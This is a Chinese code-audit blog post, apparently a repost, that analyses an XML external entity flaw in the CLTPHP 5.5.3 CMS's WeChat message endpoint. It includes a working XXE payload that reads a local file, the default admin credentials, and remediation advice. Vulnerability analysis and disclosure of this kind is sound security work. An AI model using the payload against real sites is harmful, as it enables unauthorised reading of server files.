码迷,mamicode.com
首页 > Web开发 > 详细

【代码审计】CLTPHP_v5.5.3前台XML外部实体注入漏洞分析

时间:2018-12-02 14:28:35      阅读:245      评论:0      收藏:0      [点我收藏+]

标签:--   size   实体   存在   isa   width   style   程序   root   

0x01 环境准备

CLTPHP官网:http://www.cltphp.com

网站源码版本:CLTPHP内容管理系统5.5.3版本

程序源码下载:https://gitee.com/chichu/cltphp

默认后台地址: http://127.0.0.1/admin/login/index.html

默认账号密码: 后台登录名:admin  密码:admin123

测试网站首页:

技术分享图片

 

0x01 代码分析

1、漏洞文件位置:/app/wchat/controller/Wchat.php第100-133行:

 技术分享图片

在这段代码中,用file_get_contents("php://input") 接收XML数据,然后带入simplexml_load_string函数中,导致程序在实现上存在XML外部实体注入。

接着往下看,如何去利用呢?

xml的解析结果返回给$postObj,进行条件判断,根据MsgType取值进入不同的回复机制中处理,当MsgType=text,进入MsgTypeText函数,跟进这个函数看看:

2、漏洞文件位置:/app/wchat/controller/Wchat.php 第141-172行:

 技术分享图片

这段函数进行消息回复处理,将获得$contentStr进行判断是否是数组,然后带入函数处理,最后返回结果。我们来看一下event_key_text函数:

3、漏洞文件位置:/extend/clt/WchatOauth.php 第155-171行:

 技术分享图片

通过sprintf函数返回6个节点,其中ToUserName、FromUserName可控,我们可以通过构造Payload,实现任意文件读取,攻击者可利用该漏洞获取网站敏感信息。

0x02 漏洞利用

1、 通过构造Paylod读取win.ini文件内容

Pauload:http://127.0.0.1/wchat/wchat/getMessage.html

  1. <?xml version="1.0" encoding="utf-8"?>  
  2. <!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///C:/windows/win.ini" >]>  
  3. <root><MsgType>text</MsgType> <ToUserName>&xxe; </ToUserName></root>  

 技术分享图片

 

0x03 修复建议

方案一、使用开发语言提供的禁用外部实体的方法

PHP:libxml_disable_entity_loader(true);

方案二、过滤用户提交的XML数据 关键词:<!DOCTYPE和<!ENTITY,或者,SYSTEM和PUBLIC。

 

最后

欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

技术分享图片 

 

【代码审计】CLTPHP_v5.5.3前台XML外部实体注入漏洞分析

标签:--   size   实体   存在   isa   width   style   程序   root   

原文地址:https://www.cnblogs.com/xiaozi/p/10053114.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!